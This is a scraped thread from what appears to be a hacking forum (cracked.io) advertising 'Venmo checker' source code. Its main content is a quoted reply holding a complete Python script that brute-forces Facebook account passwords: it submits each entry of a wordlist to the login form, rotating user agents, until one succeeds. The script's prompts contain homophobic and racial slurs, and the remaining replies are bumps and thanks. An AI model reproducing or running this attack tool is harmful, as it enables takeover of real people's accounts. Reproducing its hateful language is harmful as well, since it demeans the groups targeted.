Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!

cracked.io | Best Forum Around | Free Premium Accounts




 4237

⭐Venmo Checker Source Code⭐ (Python)

by SpEc09 - 26 September, 2023 - 12:33 AM
This post is by a banned member (VultureORdie) - Unhide
43
Posts
0
Threads
#41
Good stuff good stuff
(28 December, 2023 - 02:53 AM)imagecolor Wrote: Show More
Code:
import sys
import mechanize
import cookielib
import random




email = str(raw_input("Enter the Facebook Username (or) Email (or) Phone Number for gayness asshole: "))


passwordlist = str(raw_input("Enter the wordlist name and path example /dick/mydick/urdick : "))


login = 'https://www.facebook.com/login.php?login_attempt=1'


useragents = [('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

def main():
global br
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_handle_robots(False)
br.set_handle_redirect(True)
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
welcome()
search()
print("Password does not exist in the wordlist")

def brute(password):
sys.stdout.write("\r[*] Trying ..... {}\n".format(password))
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(useragents))]
site = br.open(login)
br.select_form(nr = 0)
br.form['email'] = email
br.form['pass'] = password
sub = br.submit()
log = sub.geturl()
if log != login and (not 'login_attempt' in log):
print("\n\n[+] Password Find = {}".format(password))
raw_input("ANY KEY to Exit....")
sys.exit(1)

def search():
global password
passwords = open(passwordlist,"r")
for password in passwords:
password = password.replace("\n","")
brute(password)

#welcome 
def welcome():
wel = """

        +=========================================+
        |..........   Facebook checker   ...........|
        +-----------------------------------------+
        |            #Author: mesvak           | 
      |         discord id: @darkness#1337        |
        +=========================================+
        |..........  Facebook Cracker  ...........|
        +-----------------------------------------+\n\n
"""
total = open(passwordlist,"r")
total = total.readlines()
print wel 
print " [*] Account to crack niggerholes : {}".format(email)
print " [*] Loaded like dankey:" , len(total), "passwords"
print " [*] Cracking, please wait for ur mom ...\n\n"

if __name__ == '__main__':
main()
This post is by a banned member (abirkhan9408) - Unhide
137
Posts
0
Threads
#42
(26 September, 2023 - 12:33 AM)SpEc09 Wrote: Show More
 
Old Venmo Checker Source Code I Found In My Files. Never Quite Finished. But... Its a good start for you to make your own venmo checker!
[Image: Fax9oq1.gif]
Link To Code:

Leechers = Gay
[Image: wE1ikgU.gif]
[Image: EO1z2uT.gif]

This is a bump
[Image: standard_12.gif?ex=65345855&is=6521e355&...304a2709a&]
?Underrated Asf! Best in the market. ?
hiiii
This post is by a banned member (marter14) - Unhide
marter14  
Registered
414
Posts
0
Threads
#43
Thanks
This post is by a banned member (Holdup12) - Unhide
Holdup12  
Registered
126
Posts
0
Threads
#44
ty
This post is by a banned member (Eliasthefr) - Unhide
29
Posts
0
Threads
#45
(26 September, 2023 - 12:33 AM)SpEc09 Wrote: Show More
 
Old Venmo Checker Source Code I Found In My Files. Never Quite Finished. But... Its a good start for you to make your own venmo checker!
[Image: Fax9oq1.gif]
Link To Code:

Leechers = Gay
[Image: wE1ikgU.gif]
[Image: EO1z2uT.gif]

This is a bump
[Image: standard_12.gif?ex=65345855&is=6521e355&...304a2709a&]
?Underrated Asf! Best in the market. ?

thx

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 2 Guest(s)